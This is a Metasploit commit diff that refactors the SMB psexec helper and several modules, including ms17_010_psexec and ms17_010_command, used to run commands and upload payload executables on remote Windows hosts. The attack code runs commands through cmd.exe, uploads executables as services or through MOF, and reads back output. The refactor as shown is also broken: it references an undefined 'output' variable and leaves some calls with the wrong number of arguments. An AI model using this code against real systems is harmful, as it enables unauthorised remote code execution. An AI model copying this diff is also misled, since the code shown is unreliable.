fix opt dependencies

rapid7 · Apr 24, 2018 · 3353102 · 3353102
1 parent 4de9f84
commit 3353102
Show file tree

Hide file tree

Showing 5 changed files with 48 additions and 49 deletions.
diff --git a/lib/msf/core/exploit/smb/client/psexec.rb b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -194,16 +194,16 @@ def psexec(command, disconnect=true)
     true
   end
 
-  def powershell_installed?
-    share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
+  def powershell_installed?(smb_share, psh_path)
+    share = "\\\\#{datastore['RHOST']}\\#{smb_share}"
 
     case datastore['SHARE'].upcase
     when 'ADMIN$'
       path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
     when 'C$'
       path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
     else
-      path = datastore['PSH_PATH']
+      path = psh_path
     end
 
     simple.connect(share)
@@ -220,9 +220,9 @@ def powershell_installed?
     psh
   end
 
-  def execute_command(text, bat)
+  def execute_command(text, bat, cmd)
     # Try and execute the provided command
-    execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
+    execute = "%COMSPEC% /C echo #{cmd} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
     vprint_status("Executing the command...")
     begin
       return psexec(execute)
@@ -234,9 +234,9 @@ def execute_command(text, bat)
   end
 
   # Retrive output from command
-  def get_output(file)
+  def get_output(file, smb_share, r_ip)
     print_status("Getting the command output...")
-    output = smb_read_file(@smbshare, @ip, file)
+    output = smb_read_file(smb_share, r_ip, file)
     if output.nil?
       print_error("Error getting command output. #{$!.class}. #{$!}.")
       return
@@ -246,25 +246,12 @@ def get_output(file)
       return
     end
 
-    # Report output
-    print_good("Command completed successfuly!")
-    vprint_status("Output for \"#{datastore['COMMAND']}\":")
-    vprint_line("#{output}")
-
-    report_note(
-      :rhost => datastore['RHOSTS'],
-      :rport => datastore['RPORT'],
-      :type => "psexec_command",
-      :name => datastore['COMMAND'],
-      :data => output
-    )
-
   end
 
   # check if our process is done using these files
-  def exclusive_access(*files)
+  def exclusive_access(*files, smb_share, r_ip)
     begin
-      simple.connect("\\\\#{@ip}\\#{@smbshare}")
+      simple.connect("\\\\#{r_ip}\\#{smb_share}")
     rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
       print_status("Unable to get handle: #{accesserror}")
       return false
@@ -278,14 +265,14 @@ def exclusive_access(*files)
         print_status("Unable to get handle: #{accesserror}")
         return false
       end
-      simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
+      simple.disconnect("\\\\#{r_ip}\\#{smb_share}")
     end
     return true
   end
 
-  def cleanup_after(*files)
+  def cleanup_after(*files, smb_share, r_ip)
     begin
-      simple.connect("\\\\#{@ip}\\#{@smbshare}")
+      simple.connect("\\\\#{r_ip}\\#{smb_share}")
     rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
       print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
 )} from the target.")
@@ -324,19 +311,19 @@ def powershell
     end
   end
 
-  def native_upload
-    filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+  def native_upload(smb_share)
+    filename = "#{rand_text_alpha(8)}.exe"
     servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
-    serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
+    serviceencoder = ''
 
     # Upload the shellcode to a file
     print_status("Uploading payload...")
-    smbshare = datastore['SHARE']
+    smbshare = smb_share
     fileprefix = ""
     # if SHARE = Users/sasha/ or something like this
     if smbshare =~ /.[\\\/]/
       subfolder = true
-      smbshare = datastore['SHARE'].dup
+      smbshare = smb_share.dup
       smbshare = smbshare.gsub(/^[\\\/]/,"")
       folder_list = smbshare.split(/[\\\/]/)
       smbshare = folder_list[0]
@@ -368,10 +355,10 @@ def native_upload
     simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
 
     # define the file location
-    if datastore['SHARE'] == 'ADMIN$'
+    if smb_share == 'ADMIN$'
       file_location = "%SYSTEMROOT%\\#{filename}"
-    elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
-      file_location = datastore['SHARE'].slice(0,1) +  ":\\#{filename}"
+    elsif smb_share =~ /^[a-zA-Z]\$$/
+      file_location = smb_share.slice(0,1) +  ":\\#{filename}"
     else
       file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
     end
@@ -381,7 +368,7 @@ def native_upload
     unless datastore['SERVICE_PERSIST']
       print_status("Deleting \\#{filename}...")
       #This is not really useful but will prevent double \\ on the wire :)
-      if datastore['SHARE'] =~ /.[\\\/]/
+      if smb_share =~ /.[\\\/]/
         simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
         begin
           simple.delete("\\#{fileprefix}\\#{filename}")
@@ -399,14 +386,14 @@ def native_upload
     end
   end
 
-  def mof_upload
+  def mof_upload(smb_share)
     share = "\\\\#{datastore['RHOST']}\\ADMIN$"
-    filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+    filename = "#{rand_text_alpha(8)}.exe"
 
     # payload as exe
     print_status("Trying wbemexec...")
     print_status("Uploading Payload...")
-    if datastore['SHARE'] != 'ADMIN$'
+    if smb_share != 'ADMIN$'
       print_error('Wbem will only work with ADMIN$ share')
       return
     end

diff --git a/modules/auxiliary/admin/smb/ms17_010_command.rb b/modules/auxiliary/admin/smb/ms17_010_command.rb
@@ -93,21 +93,33 @@ def smb_pwn(ip)
     @ip = ip
 
     # Try and authenticate with given credentials
-    res = execute_command(text, bat)
+    res = execute_command(text, bat, datastore['COMMAND'])
 
     if res
       for i in 0..(datastore['RETRY'])
         Rex.sleep(datastore['DELAY'])
         # if the output file is still locked then the program is still likely running
-        if (exclusive_access(text))
+        if (exclusive_access(text, @smbshare, @ip))
           break
         elsif (i == datastore['RETRY'])
           print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
         end
       end
-      get_output(text)
+      get_output(text, @smbshare, @ip)
     end
 
-    cleanup_after(text, bat)
+    cleanup_after(text, bat, @smbshare, @ip)
+
+    # Report output
+    print_good("Command completed successfuly!")
+    vprint_status("Output for \"#{datastore['COMMAND']}\":")
+    vprint_line("#{output}")
+    report_note(
+      :rhost => datastore['RHOSTS'],
+      :rport => datastore['RPORT'],
+      :type  => "psexec_command",
+      :name => datastore['COMMAND'],
+      :data => output
+    )
   end
 end
diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb
@@ -81,10 +81,10 @@ def run_host(ip)
             print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
           end
         end
-        get_output(text)
+        get_output(text, @smbshare, @ip)
       end
 
-      cleanup_after(text, bat)
+      cleanup_after(bat, @smbshare, @ip)
       disconnect
     end
   end

diff --git a/modules/exploits/windows/smb/ms17_010_psexec.rb b/modules/exploits/windows/smb/ms17_010_psexec.rb
@@ -120,19 +120,19 @@ def exploit
   def smb_pwn()
     case target.name
     when 'Automatic'
-      if powershell_installed?
+      if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
         print_status('Selecting PowerShell target')
         powershell
       else
         print_status('Selecting native target')
-        native_upload
+        native_upload(datastore['SHARE'])
       end
     when 'PowerShell'
       powershell
     when 'Native upload'
       native_upload
     when 'MOF upload'
-      mof_upload
+      mof_upload(datastore['SHARE'])
     end
 
     handler

diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
@@ -112,19 +112,19 @@ def exploit
 
     case target.name
     when 'Automatic'
-      if powershell_installed?
+      if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
         print_status('Selecting PowerShell target')
         powershell
       else
         print_status('Selecting native target')
-        native_upload
+        native_upload(datastore['SHARE'])
       end
     when 'PowerShell'
       powershell
     when 'Native upload'
       native_upload
     when 'MOF upload'
-      mof_upload
+      mof_upload(datastore['SHARE'])
     end
 
     handler